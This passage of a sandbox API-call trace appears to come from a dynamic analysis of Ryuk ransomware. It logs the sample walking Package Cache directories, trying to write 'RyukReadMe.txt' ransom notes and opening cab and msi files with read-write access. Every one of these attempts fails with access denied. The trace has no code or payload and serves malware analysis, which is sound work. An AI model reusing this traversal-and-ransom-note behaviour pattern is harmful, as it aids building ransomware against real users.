out: lpFindFileData=0x29abb30) returned 0 [0159.743] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.743] SetLastError (dwErrCode=0x0) [0159.743] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.743] GetLastError () returned 0x5 [0159.743] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.743] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.744] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.744] SetLastError (dwErrCode=0x0) [0159.744] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.744] GetLastError () returned 0x5 [0159.744] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.744] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.744] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.744] SetLastError (dwErrCode=0x0) [0159.744] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.744] GetLastError () returned 0x5 [0159.744] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.744] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.744] SetLastError (dwErrCode=0x0) [0159.744] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.748] GetLastError () returned 0x5 [0159.748] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.755] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.755] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.755] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.755] SetLastError (dwErrCode=0x0) [0159.755] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.756] GetLastError () returned 0x5 [0159.756] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.756] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.756] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.756] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.756] SetLastError (dwErrCode=0x0) [0159.756] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.756] GetLastError () returned 0x5 [0159.756] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.756] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.756] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.756] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.757] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.757] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.757] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.757] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.757] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.757] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.757] SetLastError (dwErrCode=0x0) [0159.757] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.757] GetLastError () returned 0x5 [0159.757] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.757] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.758] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.758] SetLastError (dwErrCode=0x0) [0159.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.758] GetLastError () returned 0x5 [0159.758] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.758] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.758] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.758] SetLastError (dwErrCode=0x0) [0159.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.758] GetLastError () returned 0x5 [0159.758] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.758] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.758] SetLastError (dwErrCode=0x0) [0159.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.758] GetLastError () returned 0x5 [0159.758] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.758] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.759] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.759] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.759] SetLastError (dwErrCode=0x0) [0159.759] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.759] GetLastError () returned 0x5 [0159.759] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.759] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.759] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.759] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.759] SetLastError (dwErrCode=0x0) [0159.759] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.759] GetLastError () returned 0x5 [0159.759] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.759] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.759] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.760] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.760] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.760] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.760] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0159.760] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.761] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.761] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.761] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.761] SetLastError (dwErrCode=0x0) [0159.761] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.761] GetLastError () returned 0x5 [0159.761] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.761] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.761] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.761] SetLastError (dwErrCode=0x0) [0159.761] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.761] GetLastError () returned 0x5 [0159.761] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.761] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.761] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.762] SetLastError (dwErrCode=0x0) [0159.762] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.762] GetLastError () returned 0x5 [0159.762] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.762] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.762] SetLastError (dwErrCode=0x0) [0159.762] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.762] GetLastError () returned 0x5 [0159.762] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.762] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.762] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.762] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.762] SetLastError (dwErrCode=0x0) [0159.762] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.762] GetLastError () returned 0x5 [0159.762] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.763] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.763] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.763] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.763] SetLastError (dwErrCode=0x0) [0159.763] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.763] GetLastError () returned 0x5 [0159.763] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.763] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.763] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.763] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.763] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.764] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.764] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.764] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.764] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.764] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.764] SetLastError (dwErrCode=0x0) [0159.764] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.764] GetLastError () 